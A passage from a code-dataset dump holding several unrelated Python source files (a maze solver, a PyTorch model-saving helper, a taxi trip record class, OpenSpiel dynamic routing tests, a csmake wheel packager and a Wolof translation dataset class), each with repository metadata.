TA\n","repo_name":"claytonjasilva/sisLoja","sub_path":"modulos/grupoA/gercaixa.py","file_name":"gercaixa.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36148038060","text":"laberinto = [\n [' ', 'X', 'X', 'X', 'X'], \n [' ', 'X', ' ', ' ', ' '],\n [' ', 'X', ' ', 'X', ' '], \n [' ', ' ', ' ', 'X', ' '], \n ['X', 'X', 'X', 'X', 'S']\n ]\ndef recorrer_laberinto():\n i=0\n j=0\n lista=[]\n posiciones_anteriores=[(0, 0)]\n while laberinto[i][j]!='S':\n if (laberinto[i+1][j]==' ' or laberinto[i+1][j]=='S') and (i+1, j) not in posiciones_anteriores:\n i+=1\n lista.append('abajo')\n posiciones_anteriores.append((i, j))\n \n 
elif laberinto[i][j+1]==' ' and (i, j+1) not in posiciones_anteriores:\n j+=1\n lista.append('derecha')\n posiciones_anteriores.append((i, j))\n\n elif laberinto[i-1][j]==' ' and (i-1, j) not in posiciones_anteriores:\n i-=1\n lista.append('arriba')\n posiciones_anteriores.append((i, j))\n \n elif laberinto[i][j-1]==' ' and (i, j-1) not in posiciones_anteriores:\n j-=1\n lista.append('izquierda')\n posiciones_anteriores.append((i, j))\n\n\n return lista\n\nprint(recorrer_laberinto())\n","repo_name":"Asierjunquera1/el-laberinto-final","sub_path":"laberinto.py","file_name":"laberinto.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30372150758","text":"\r\n\"\"\"\r\nContains various utility functions for PyTorch model training and saving.\r\n\"\"\"\r\nimport torch\r\nfrom pathlib import Path\r\n\r\ndef save_model(model,\r\n directory,\r\n model_name):\r\n \"\"\"save a model to a directory\r\n \r\n Args:\r\n model\r\n directory\r\n model_name\r\n example:\r\n save_model(model=model_0,\r\n target_dir=\"models\",\r\n model_name=\"05_going_modular_tingvgg_model.pth\")\r\n \"\"\"\r\n directory_path = Path(directory)\r\n directory_path.mkdir(parents=True,exist_ok=True)\r\n \r\n assert model_name.endswith(\"pth\") or model_name.endswith(\"th\") \r\n model_save_path = directory_path/model_name\r\n \r\n print(f\"saving model to {model_save_path}\")\r\n\r\n torch.save(obj=model.state_dict(),\r\n f=model_save_path)\r\n \r\n \r\n","repo_name":"pouya-alipour741/Courses","sub_path":"Pytorch/going_modular/going_modular/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34839253435","text":"import json\nfrom datetime import datetime\n\n'''\nThis is the unified class to contain records from Green, Yellow, and FHV\n'''\nclass TaxiTripRecordModel:\n TaxiService = \"\"\n VendorID = 0\n LpepPickupDateTime = 0\n LpepDropOffDateTime = 0\n PULocationID = 0\n DOLocationID = 0\n\n DATE_TIME_FORMAT = \"%Y-%m-%d %H:%M:%S\"\n\n\n '''\n Constructor to initialize all properties\n ''' \n def __init__(self, TaxiService: str, VendorID: int, LpepPickupDateTime: datetime, LpepDropOffDateTime: datetime, PULocationID: int, DOLocationID:int ):\n self.TaxiService = TaxiService\n self.VendorID = VendorID\n self.LpepPickupDateTime = LpepPickupDateTime\n self.LpepDropOffDateTime = LpepDropOffDateTime\n self.PULocationID = PULocationID\n self.DOLocationID = DOLocationID\n\n '''\n This function formats the object data as a tuple, used for database insert\n returns tuple\n '''\n def ToTuple(self):\n return (self.TaxiService, \n self.VendorID, \n self.LpepPickupDateTime.strftime(TaxiTripRecordModel.DATE_TIME_FORMAT), \n self.LpepDropOffDateTime.strftime(TaxiTripRecordModel.DATE_TIME_FORMAT), \n self.PULocationID, \n self.DOLocationID)\n\n '''\n This function takes tuple tup, and creates an object. 
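A round-trip usage sketch for ToTuple and FromTuple; the datetimes survive the conversion because both directions share DATE_TIME_FORMAT:

from datetime import datetime

rec = TaxiTripRecordModel("green", 2,
                          datetime(2021, 5, 1, 8, 30, 0),
                          datetime(2021, 5, 1, 8, 55, 0), 74, 42)
row = rec.ToTuple()  # strings and ints, ready for a parameterized INSERT
clone = TaxiTripRecordModel.FromTuple(row)
assert clone.ToDict() == rec.ToDict()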
This is used for database retrieval\n    returns TaxiTripRecordModel\n    '''\n    def FromTuple(tup: tuple):\n        (TaxiService, VendorID, LpepPickupDateTime, LpepDropOffDateTime, PULocationID, DOLocationID) = tup\n        if type(LpepDropOffDateTime) is str:\n            LpepPickupDateTime = datetime.strptime(LpepPickupDateTime, TaxiTripRecordModel.DATE_TIME_FORMAT)\n            LpepDropOffDateTime = datetime.strptime(LpepDropOffDateTime, TaxiTripRecordModel.DATE_TIME_FORMAT)\n\n        return TaxiTripRecordModel(TaxiService,VendorID,LpepPickupDateTime,LpepDropOffDateTime,PULocationID,DOLocationID)\n\n    '''\n    Serialize the object for JSON REST response\n    returns dictionary\n    '''\n    def ToDict(self):\n        dictRep = { 'TaxiService': self.TaxiService,\n                'VendorID': self.VendorID,\n                'LpepPickupDateTime' : self.LpepPickupDateTime.strftime(self.DATE_TIME_FORMAT),\n                'LpepDropOffDateTime' : self.LpepDropOffDateTime.strftime(self.DATE_TIME_FORMAT),\n                'PULocationID' : self.PULocationID,\n                'DOLocationID' : self.DOLocationID\n                } \n        return dictRep\n\n","repo_name":"michstmatt/TripAnalytics","sub_path":"TripAnalyticsCode/CoreLib/SharedModels/TaxiTripRecordModel.py","file_name":"TaxiTripRecordModel.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379817387","text":"from absl.testing import absltest\n\nfrom open_spiel.python import games  # pylint:disable=unused-import\nfrom open_spiel.python import policy\nfrom open_spiel.python import rl_environment\nfrom open_spiel.python.algorithms import cfr\nfrom open_spiel.python.algorithms import expected_game_score\nfrom open_spiel.python.algorithms import exploitability\nfrom open_spiel.python.algorithms import external_sampling_mccfr as external_mccfr\nfrom open_spiel.python.algorithms import outcome_sampling_mccfr as outcome_mccfr\nfrom open_spiel.python.games import dynamic_routing\nfrom open_spiel.python.games import dynamic_routing_utils\nimport pyspiel\n\n_NUM_ITERATION_CFR_TEST = 1\n\n\nclass DynamicRoutingGameTest(absltest.TestCase):\n\n  def test_random_game(self):\n    \"\"\"Tests basic API functions with the standard game tests.\"\"\"\n    game = pyspiel.load_game(\"python_dynamic_routing\")\n    pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)\n\n  def test_game_as_turn_based(self):\n    \"\"\"Check the game can be converted to a turn-based game.\"\"\"\n    game = pyspiel.load_game(\"python_dynamic_routing\")\n    turn_based = pyspiel.convert_to_turn_based(game)\n    pyspiel.random_sim_test(\n        turn_based, num_sims=10, serialize=False, verbose=True)\n\n  def test_game_as_turn_based_via_string(self):\n    \"\"\"Check the game can be created as a turn-based game from a string.\"\"\"\n    game = pyspiel.load_game(\n        \"turn_based_simultaneous_game(game=python_dynamic_routing())\")\n    pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)\n\n  def test_non_default_param_from_string(self):\n    \"\"\"Check params can be given through string loading.\"\"\"\n    game = pyspiel.load_game(\"python_dynamic_routing(max_num_time_step=5)\")\n    self.assertEqual(game.max_game_length(), 5)\n\n  def test_non_default_param_from_dict(self):\n    \"\"\"Check params can be given through a dictionary.\"\"\"\n    game = pyspiel.load_game(\"python_dynamic_routing\", {\"max_num_time_step\": 5})\n    self.assertEqual(game.max_game_length(), 5)\n\n  def test_action_consistency_convert_to_turn_based(self):\n    \"\"\"Check if the sequential game is consistent with the game.\"\"\"\n    game = 
pyspiel.load_game(\"python_dynamic_routing\")\n    seq_game = pyspiel.convert_to_turn_based(game)\n    state = game.new_initial_state()\n    seq_state = seq_game.new_initial_state()\n    self.assertEqual(\n        state.legal_actions(seq_state.current_player()),\n        seq_state.legal_actions(),\n        msg=\"The sequential actions are not correct.\")\n\n  def test_cfr_on_turn_based_game_with_exploitability(self):\n    \"\"\"Check if CFR can be applied to the sequential game.\"\"\"\n    game = pyspiel.load_game(\n        \"python_dynamic_routing(max_num_time_step=5,time_step_length=1.0)\")\n    seq_game = pyspiel.convert_to_turn_based(game)\n    cfr_solver = cfr.CFRSolver(seq_game)\n    for _ in range(_NUM_ITERATION_CFR_TEST):\n      cfr_solver.evaluate_and_update_policy()\n    exploitability.nash_conv(seq_game, cfr_solver.average_policy())\n\n  def test_ext_mccfr_on_turn_based_game_with_exploitability(self):\n    \"\"\"Check if external sampling MCCFR can be applied.\"\"\"\n    game = pyspiel.load_game(\n        \"python_dynamic_routing(max_num_time_step=5,time_step_length=1.0)\")\n    seq_game = pyspiel.convert_to_turn_based(game)\n    cfr_solver = external_mccfr.ExternalSamplingSolver(\n        seq_game, external_mccfr.AverageType.SIMPLE)\n    for _ in range(_NUM_ITERATION_CFR_TEST):\n      cfr_solver.iteration()\n    exploitability.nash_conv(seq_game, cfr_solver.average_policy())\n\n  def test_int_mccfr_on_turn_based_game_with_exploitability(self):\n    \"\"\"Check if outcome sampling MCCFR can be applied.\"\"\"\n    game = pyspiel.load_game(\n        \"python_dynamic_routing(max_num_time_step=5,time_step_length=1.0)\")\n    seq_game = pyspiel.convert_to_turn_based(game)\n    cfr_solver = outcome_mccfr.OutcomeSamplingSolver(seq_game)\n    for _ in range(_NUM_ITERATION_CFR_TEST):\n      cfr_solver.iteration()\n    exploitability.nash_conv(seq_game, cfr_solver.average_policy())\n\n  def test_creation_of_rl_environment(self):\n    \"\"\"Check if an RL environment can be created.\"\"\"\n    game = pyspiel.load_game(\"python_dynamic_routing\")\n    seq_game = pyspiel.convert_to_turn_based(game)\n    rl_environment.Environment(seq_game)\n\n  def test_vehicle_origin_outside_network(self):\n    \"\"\"Check that an error is raised if a vehicle's origin is outside the Network.\"\"\"\n    vehicles = [dynamic_routing_utils.Vehicle(\"I->O\", \"D->E\", 0)]\n    with self.assertRaises(ValueError):\n      dynamic_routing.DynamicRoutingGame(\n          {\n              \"max_num_time_step\": 10,\n              \"time_step_length\": 0.5,\n              \"players\": -1\n          },\n          vehicles=vehicles)\n\n  def test_vehicle_destination_outside_network(self):\n    \"\"\"Check that an error is raised if a vehicle's destination is outside the Network.\"\"\"\n    vehicles = [dynamic_routing_utils.Vehicle(\"O->A\", \"E->F\", 0)]\n    with self.assertRaises(ValueError):\n      dynamic_routing.DynamicRoutingGame(\n          {\n              \"max_num_time_step\": 10,\n              \"time_step_length\": 0.5,\n              \"players\": -1\n          },\n          vehicles=vehicles)\n\n  def test_multiple_departure_time_vehicle(self):\n    \"\"\"Check that the departure time can be defined.\"\"\"\n    vehicles = [\n        dynamic_routing_utils.Vehicle(\"O->A\", \"D->E\", 0),\n        dynamic_routing_utils.Vehicle(\"O->A\", \"D->E\", 0.5),\n        dynamic_routing_utils.Vehicle(\"O->A\", \"D->E\", 1.0)\n    ]\n    game = dynamic_routing.DynamicRoutingGame(\n        {\n            \"max_num_time_step\": 10,\n            \"time_step_length\": 0.5,\n            \"players\": -1\n        },\n        vehicles=vehicles)\n    pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)\n\n  def test_game_evolution_first_action_policy(self):\n    \"\"\"Check game deterministic evolution under first action policy.\"\"\"\n    # Test evolution of the game as expected (test value of the state).\n    # test legal_actions().\n\n  
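The stub above only records the intent; a sketch of what a deterministic-evolution check could look like, always applying each player's first legal action. This assumes the game has no chance nodes, which the simultaneous-move API used here suggests, and is not the repository's implementation:

game = pyspiel.load_game("python_dynamic_routing(max_num_time_step=5)")
state = game.new_initial_state()
while not state.is_terminal():
    # Every player picks its first legal action, or the no-op when it cannot move.
    joint_action = [
        (state.legal_actions(p) or [dynamic_routing_utils.NO_POSSIBLE_ACTION])[0]
        for p in range(game.num_players())
    ]
    state.apply_actions(joint_action)
print(state.returns())  # realized per-vehicle returns at the terminal state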
def test_observer_correct(self):\n    \"\"\"Check that the observer is correctly updated.\"\"\"\n    # Add test about observer and tensor being updated.\n\n  def test_apply_actions_error_no_movement_with_negative_waiting_time(self):\n    \"\"\"Check that a vehicle cannot choose to not move if it has to move.\"\"\"\n    # Test apply_actions().\n\n  def test_apply_actions_error_wrong_movement_with_negative_waiting_time(self):\n    \"\"\"Check that a vehicle cannot choose to move to a non-successor link.\"\"\"\n    # Test apply_actions().\n\n  def test_apply_actions_error_movement_with_positive_waiting_time(self):\n    \"\"\"Check that a vehicle cannot choose to move if it cannot move yet.\"\"\"\n    # Test apply_actions().\n\n  def test_braess_paradox(self):\n    \"\"\"Test that the Braess paradox can be reproduced with the mean field game.\"\"\"\n    num_player = 8\n    braess_network = dynamic_routing_utils.Network(\n        {\n            \"O\": \"A\",\n            \"A\": [\"B\", \"C\"],\n            \"B\": [\"C\", \"D\"],\n            \"C\": [\"D\"],\n            \"D\": [\"E\"],\n            \"E\": []\n        },\n        node_position={\n            \"O\": (0, 0),\n            \"A\": (1, 0),\n            \"B\": (2, 1),\n            \"C\": (2, -1),\n            \"D\": (3, 0),\n            \"E\": (4, 0)\n        },\n        bpr_a_coefficient={\n            \"O->A\": 0,\n            \"A->B\": 1.0,\n            \"A->C\": 0,\n            \"B->C\": 0,\n            \"B->D\": 0,\n            \"C->D\": 1.0,\n            \"D->E\": 0\n        },\n        bpr_b_coefficient={\n            \"O->A\": 1.0,\n            \"A->B\": 1.0,\n            \"A->C\": 1.0,\n            \"B->C\": 1.0,\n            \"B->D\": 1.0,\n            \"C->D\": 1.0,\n            \"D->E\": 1.0\n        },\n        capacity={\n            \"O->A\": num_player,\n            \"A->B\": num_player,\n            \"A->C\": num_player,\n            \"B->C\": num_player,\n            \"B->D\": num_player,\n            \"C->D\": num_player,\n            \"D->E\": num_player\n        },\n        free_flow_travel_time={\n            \"O->A\": 0,\n            \"A->B\": 1.0,\n            \"A->C\": 2.0,\n            \"B->C\": 0.25,\n            \"B->D\": 2.0,\n            \"C->D\": 1.0,\n            \"D->E\": 0\n        })\n\n    demand = [\n        dynamic_routing_utils.Vehicle(\"O->A\", \"D->E\") for _ in range(num_player)\n    ]\n    game = dynamic_routing.DynamicRoutingGame(\n        {\n            \"time_step_length\": 0.125,\n            \"max_num_time_step\": 40\n        },\n        network=braess_network,\n        vehicles=demand)\n\n    class TruePathPolicy(policy.Policy):\n\n      def __init__(self, game):\n        super().__init__(game, list(range(num_player)))\n        self._path = {}\n\n      def action_probabilities(self, state, player_id=None):\n        assert player_id is not None\n        legal_actions = state.legal_actions(player_id)\n        if not legal_actions:\n          return {dynamic_routing_utils.NO_POSSIBLE_ACTION: 1.0}\n        elif len(legal_actions) == 1:\n          return {legal_actions[0]: 1.0}\n        else:\n          if legal_actions[0] == 1:\n            if self._path[player_id] in [\"top\", \"middle\"]:\n              return {1: 1.0}\n            elif self._path[player_id] == \"bottom\":\n              return {2: 1.0}\n            else:\n              raise ValueError()\n          elif legal_actions[0] == 3:\n            if self._path[player_id] == \"top\":\n              return {4: 1.0}\n            elif self._path[player_id] == \"middle\":\n              return {3: 1.0}\n            else:\n              raise ValueError()\n        raise ValueError(f\"{legal_actions} is not correct.\")\n\n    class NashEquilibriumBraess(TruePathPolicy):\n\n      def __init__(self, game):\n        super().__init__(game)\n        for player_id in range(num_player):\n          if player_id % 2 == 0:\n            self._path[player_id] = \"middle\"\n          if player_id % 4 == 1:\n            self._path[player_id] = \"top\"\n          if player_id % 4 == 3:\n            self._path[player_id] = \"bottom\"\n\n    class SocialOptimumBraess(NashEquilibriumBraess):\n\n      def __init__(self, game):\n        super().__init__(game)\n        for player_id in range(num_player):\n          if player_id % 2 == 0:\n            self._path[player_id] = \"top\"\n          if player_id % 2 == 1:\n            self._path[player_id] = \"bottom\"\n\n    ne_policy = NashEquilibriumBraess(game)\n    # Debug issue with nash conv computation and uncomment 
the following line.\n    # self.assertEqual(exploitability.nash_conv(game, ne_policy), 0.0)\n    self.assertSequenceAlmostEqual(\n        -expected_game_score.policy_value(game.new_initial_state(), ne_policy),\n        [3.75] * num_player)\n\n    so_policy = SocialOptimumBraess(game)\n    # Debug issue with nash conv computation and uncomment the following line.\n    # self.assertEqual(exploitability.nash_conv(game, so_policy), 0.125)\n    self.assertSequenceAlmostEqual(\n        -expected_game_score.policy_value(game.new_initial_state(), so_policy),\n        [3.5] * num_player)\n\n\nif __name__ == \"__main__\":\n  absltest.main()\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/games/dynamic_routing_test.py","file_name":"dynamic_routing_test.py","file_ext":"py","file_size_in_byte":10846,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"13982510595","text":"from CsmakeModules.ZipPackager import ZipPackager\nfrom CsmakeModules.Packager import Packager\nimport zipfile\nimport os.path\nimport StringIO\nimport hashlib\nimport json\nimport sys\n\nclass WheelPackage(ZipPackager):\n    \"\"\"Purpose: Implements a PEP-427 compliant wheel packaging\n       Implements: ZipPackager\n       Type: Module   Library: csmake-packaging\n       Package Name Format: python\n       Description: The implementation for WheelPackage creates a wheel using\n                    the ZipPackager implementation.\n                    - see: --list-type=ZipPackager and --list-type=Packager\n                      for more information\n       Phases:\n           package - Will build the package\n           clean, package_clean - will delete the package\n       Options:\n           top-level - (OPTIONAL) Directory of the top level package directory\n                       Default is to use the package name\n           package-version - the version for the package\n           use-package-version - The package version will be used\n                       as a build number (see PEP-0427)\n           maps - points to install map based sections that define\n                  how files should be mapped into the package\n           arch - (OPTIONAL) Specify the architecture (default is any)\n                  follow the PEP-425 Spec for values\n           abi - (OPTIONAL) Specify the python abi (default is none)\n                  follow the PEP-425 Spec for values\n           result - directory to put the results\n       The package will be called:\n           ----.whl\n       If use-package-version is True:\n           -----.whl\n       NOTE: The \"python tag\" will be derived from the metadata classifiers.\n\n       Joinpoints: (see Packaging module)\n       Flowcontrol Advice: (see Packaging module)\n       Install Map Definitions: (see Packaging module)\n\n       Notes:\n           Use of this module only makes sense with a python distribution\n           Metadata classifiers have to include some flavor of:\n               Programming Language :: Python\n\n           \":: 2\" specified with \":: 2.7\" will be taken to mean py2 compatible\n           \":: 2 :: Only\" specified with \":: 3 :: Only\" will ignore \"Only\"\n               and specify a py2.py3 package, as the actual meaning is void\n               i.e., multiple uses of 'Only' are invalid.\n       See Also:\n           csmake --list-type ZipPackager\n           csmake --list-type Packager\n    \"\"\"\n\n    REQUIRED_OPTIONS = ['maps', 'result', 'package-version']\n    PACKAGER_NAME_FORMAT = 'python'\n\n    WHEEL_GENERATOR = \"csmake (WheelPackage 0.1.0)\"\n\n    METAMAP_METHODS = {\n        'Name' : Packager.PackageNameMapper,\n        'Summary' : Packager.MetadataMapper,\n        'License' : Packager.METAMAP_METHODS['License'],\n        'Keywords' : Packager.MetadataMapper,\n        'Home-page' : Packager.MetadataMapper,\n        '**python-tag' : Packager.AppendingClassifierMapper\n    }\n\n    METAMAP = {\n        'Name' : 'name',\n        'Summary' : 'description',\n        'Keywords' : 'keywords',\n        'Home-page' : 'homepage'\n    }\n\n    CLASSIFIER_MAPS = {\n        
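        # Each entry maps a classifier string to a (priority, tag) pair; the\n        # entries are sorted by priority and all tags sharing the lowest\n        # priority are joined (e.g. 'py2.py3') to build the wheel's python\n        # tag in _calculateFileNameAndVersioning below.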
'**python-tag' : {\n '' : (sys.maxint, None),\n 'Programming Language :: Python' : (9, 'py2.py3'),\n 'Programming Language :: Python :: 2' : (4, 'py2'),\n 'Programming Language :: Python :: 2.3' : (5, 'py23'),\n 'Programming Language :: Python :: 2.4' : (5, 'py24'),\n 'Programming Language :: Python :: 2.5' : (5, 'py25'),\n 'Programming Language :: Python :: 2.6' : (5, 'py26'),\n 'Programming Language :: Python :: 2.7' : (5, 'py27'),\n 'Programming Language :: Python :: 2 :: Only' : (1, 'py2'),\n 'Programming Language :: Python :: 3' : (4, 'py3'),\n 'Programming Language :: Python :: 3.0' : (5, 'py30'),\n 'Programming Language :: Python :: 3.1' : (5, 'py31'),\n 'Programming Language :: Python :: 3.2' : (5, 'py32'),\n 'Programming Language :: Python :: 3.3' : (5, 'py33'),\n 'Programming Language :: Python :: 3.4' : (5, 'py34'),\n 'Programming Language :: Python :: 3 :: Only' : (1, 'py3')\n },\n 'License' : Packager.CLASSIFIER_MAPS['License']\n }\n\n def _map_path_root(self, value, pathmaps, pathkeymaps):\n pathmaps[value] = ['%s.data/data/system/' % self.packageName]\n self.archiveRoot = ''\n pathkeymaps['root'] = []\n\n def _map_path_python_lib(self, value, pathmaps, pathkeymaps):\n pathmaps[value] = ['']\n pathkeymaps['python-lib'] = ['']\n\n def _map_path_python_script(self, value, pathmaps, pathkeymaps):\n pathmaps[value] = ['%s.data/scripts' % self.packageName]\n pathkeymaps['python-script'] = ['%s.data/scripts' % self.packageName]\n\n def _calculateFileNameAndVersioning(self):\n ZipPackager._calculateFileNameAndVersioning(self)\n self.version = self.metadata._getVersionWithFormat(\n ['%(epoch)s!', '%(primary)s' ],\n True,\n ['epoch', 'primary'],\n '+' )\n version = self.version\n self.filenameVersion = version\n self.packageVersion = self.options['package-version']\n self.usePackageVersion = 'use-package-version' in self.options \\\n and self.options['use-package-version'] == 'True'\n if self.usePackageVersion:\n self.filenameFullVersion = \"%s-%s\" % (\n version,\n self.packageVersion )\n else:\n self.filenameFullVersion = version\n self.fullVersion = self.filenameFullVersion\n if '**python-tag' not in self.packageMetadata:\n self.log.error(\"One or more flavors of 'Programming Language :: Python' must be in the metadata's classifiers\")\n self.log.failed()\n raise ValueError(\"Python packaging required\")\n\n pytags = self.packageMetadata['**python-tag']\n pytags.sort()\n initprio, _ = pytags[0]\n tags = []\n for priority, tag in pytags:\n if priority != initprio:\n break\n tags.append(tag)\n tags.sort()\n pythonTag = '.'.join(tags)\n abi = 'none'\n arch = 'any'\n if 'abi' in self.options:\n abi = self.options['abi']\n if 'arch' in self.options:\n arch = self.options['arch']\n self.wheelTag = '%s-%s-%s' % (\n pythonTag,\n abi,\n arch )\n self.fullPackageName = \"%s-%s-%s.whl\" % (\n self.packageName,\n self.filenameFullVersion,\n self.wheelTag )\n self.distinfoName = \"%s-%s.dist-info\" % (\n self.packageName,\n self.version )\n self.archiveFileName = self.fullPackageName\n self.fullPathToArchive = os.path.join(\n self.resultdir,\n self.archiveFileName )\n\n def _filePlacingInPackage(self, archive, sourcePath, archivePath, contents=None):\n if sourcePath is not None:\n with open(sourcePath) as content:\n size = self._filesize(content)\n shasum = self._PEP427Encode(self._fileSHA256(content))\n self.contents.append(\"%s,sha256=%s,%s\" % (\n archivePath.lstrip('/'),\n shasum,\n size))\n elif contents is not None:\n size = len(contents)\n shacalc = hashlib.sha256()\n 
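            # In-memory contents are hashed the same way as the on-disk files\n            # above, so the RECORD entries stay consistent.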
shacalc.update(contents)\n            shasum = self._PEP427Encode(shacalc.hexdigest())\n            self.contents.append(\"%s,sha256=%s,%s\" % (\n                archivePath,\n                shasum,\n                size))\n\n    def _setupPackage(self):\n        self.contents = []\n        ZipPackager._setupPackage(self)\n\n    def _generateMetadataContents(self):\n        result = ['Metadata-Version: 2.0']\n        jsonResult = {'metadata_version':'2.0'}\n        for key, value in self.packageMetadata.iteritems():\n            if key.startswith('**'):\n                continue\n            result.append('%s: %s' % (key, value))\n            jsonResult[key.lower()] = value\n        if 'keywords' in jsonResult:\n            jsonResult['keywords'] = jsonResult['keywords'].split()\n        result.append('Version: %s' % self.version)\n        jsonResult['version'] = self.version\n        jsonResult['generator'] = self.WHEEL_GENERATOR\n        authors = []\n        jsonResult['extensions'] = {}\n        if 'copyrights' in self.productMetadata:\n            for copy in self.productMetadata['copyrights']:\n                holder = (copy['holder'],None)\n                if '<' in copy['holder']:\n                    holderparts = copy['holder'].split('<')\n                    holderName = holderparts[0]\n                    email = holderparts[1].rstrip().rstrip('>')\n                    holder = (holderName, email)\n                authors.append(holder)\n            result.append(\"Author: %s\" % ', '.join([x[0] for x in authors]))\n            emails = [x[1] for x in authors if x[1] is not None]\n            if len(emails) > 0:\n                result.append('Author-email: %s' % ', '.join(emails))\n            if 'python.details' not in jsonResult['extensions']:\n                jsonResult['extensions']['python.details'] = {}\n            if 'contacts' not in jsonResult['extensions']['python.details']:\n                jsonResult['extensions']['python.details']['contacts'] = []\n            jsonContacts = jsonResult['extensions']['python.details']['contacts']\n            for author in authors:\n                if author[1] is None:\n                    jsonContacts.append({'name':author[0], 'role':'author'})\n                else:\n                    jsonContacts.append({'name':author[0], 'email':author[1], 'role':'author'})\n        #TODO: Add python.details/document_names: {'description' : 'DESCRIPTION.rst'}\n        #TODO: Add python.exports/console_scripts\n        #TODO: Add python.commands/wrap_console\n        for classifier in self.classifiers:\n            result.append('Classifier: %s' % classifier)\n        jsonResult['classifiers'] = self.classifiers\n        arch = 'any'\n        if 'arch' in self.options:\n            arch = self.options['arch']\n        archivePath = os.path.join(\n            self.distinfoName,\n            \"METADATA\" )\n        content = '\\n'.join(result)\n        #TODO: Append DESCRIPTION.rst\n        self._filePlacingInPackage(\"data\", None, archivePath, content)\n        self.archive.writestr(archivePath, content)\n        archivePath = os.path.join(\n            self.distinfoName,\n            \"metadata.json\" )\n        content = json.dumps(jsonResult)\n        self._filePlacingInPackage(\"data\", None, archivePath, content)\n        self.archive.writestr(archivePath, content)\n\n    def _generateWheelFileContents(self):\n        result = ['Wheel-Version: 1.0', 'Generator: %s' % self.WHEEL_GENERATOR]\n        purelib = 'true'\n        if ('arch' in self.options and self.options['arch'] != 'any') \\\n            or ('abi' in self.options and self.options['abi'] != 'none'):\n            purelib = 'false'\n        result.append('Root-Is-Purelib: %s' % purelib)\n        result.append(\"Tag: %s\" % self.wheelTag)\n        if self.usePackageVersion:\n            result.append(\"Build: %s\" % self.options['package-version'])\n        archivePath = os.path.join(\n            self.distinfoName,\n            \"WHEEL\" )\n        content = '\\n'.join(result)\n        self._filePlacingInPackage(\"data\", None, archivePath, content)\n        self.archive.writestr(archivePath, content)\n\n    def _generateTopLevelFile(self):\n        toplevel = \"%s\\n\" % self.packageName\n        if 'top-level' in self.options:\n            toplevel = \"%s\\n\" % self.options['top-level']\n        archivePath = os.path.join(\n            self.distinfoName,\n            
\"top_level.txt\" )\n self._filePlacingInPackage(\"data\", None, archivePath, toplevel)\n self.archive.writestr(archivePath, toplevel)\n\n def _generateRecord(self):\n #In order to ensure all other files are captured,\n #This needs to be the last file generated.\n record = '\\n'.join(self.contents)\n archivePath = os.path.join(\n self.distinfoName,\n \"RECORD\" )\n #Do not call filePlacingInPackage -it will try to add this file to the\n # contents of this file.\n self.archive.writestr(archivePath, record)\n\n def _finishPackage(self):\n #Write out all metafiles\n #TODO: Place or generate a DESCRIPTION.rst\n self._generateMetadataContents()\n self._generateWheelFileContents()\n self._generateTopLevelFile()\n\n #Write out RECORD file\n #Last step\n self._generateRecord()\n return ZipPackager._finishPackage(self)\n","repo_name":"csmake-hpe/csmake-packaging","sub_path":"CsmakeModules/WheelPackage.py","file_name":"WheelPackage.py","file_ext":"py","file_size_in_byte":12812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21915681051","text":"\nfrom wolof_translate.utils.sent_transformers import TransformerSequences\nfrom wolof_translate.data.dataset_v4 import T5SentenceDataset\nfrom transformers import PreTrainedTokenizerFast\nfrom torch.utils.data import Dataset\nfrom typing import *\nimport pandas as pd\nimport torch\nimport re\n\nclass SentenceDataset(T5SentenceDataset):\n\n def __init__(\n self,\n data_path: str, \n tokenizer: PreTrainedTokenizerFast,\n corpus_1: str = \"french\",\n corpus_2: str = \"wolof\",\n file_sep: str = \",\",\n cp1_transformer: Union[TransformerSequences, None] = None,\n cp2_transformer: Union[TransformerSequences, None] = None,\n **kwargs):\n \n super().__init__(data_path, \n tokenizer,\n corpus_1,\n corpus_2,\n 0,\n False,\n file_sep,\n cp1_transformer,\n cp2_transformer\n **kwargs)\n \n def __getitem__(self, index):\n \"\"\"Recuperate ids and attention masks of sentences at index\n\n Args:\n index (int): The index of the sentences to recuperate\n\n Returns:\n tuple: The `sentence to translate' ids`, `the attention mask of the sentence to translate`\n `the labels' ids`\n \"\"\"\n sentence_1 = self.sentences_1[index]\n \n sentence_2 = self.sentences_2[index]\n \n # apply transformers if necessary\n if not self.cp1_transformer is None:\n \n sentence_1 = self.cp1_transformer(sentence_1)[0] \n \n if not self.cp2_transformer is None:\n \n sentence_2 = self.cp2_transformer(sentence_2)[0]\n \n # let us encode the sentences (we provide the second sentence as labels to the tokenizer)\n data = self.tokenizer(\n sentence_1\n )\n \n # let us encode the sentences (we provide the second sentence as labels to the tokenizer)\n labels = self.tokenizer(\n sentence_2\n )\n \n return (data.input_ids.squeeze(0), \n labels.input_ids.squeeze(0))\n \n","repo_name":"Oumar199/Wolof_traduction","sub_path":"wolof-translate/wolof_translate/data/dataset_v5.py","file_name":"dataset_v5.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3184705271","text":"import seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\n\ndef avg_duration_final_rinse(train_balanced: pd.DataFrame) -> None:\n temp = train_balanced[train_balanced.phase == 'final_rinse'].groupby(\"process_id\").size()\n temp.plot()\n print(\n (\"Moyenne : \" + str(int(temp.mean())) + \" / Maximum : \"\n + str(temp.max()) + \" / 
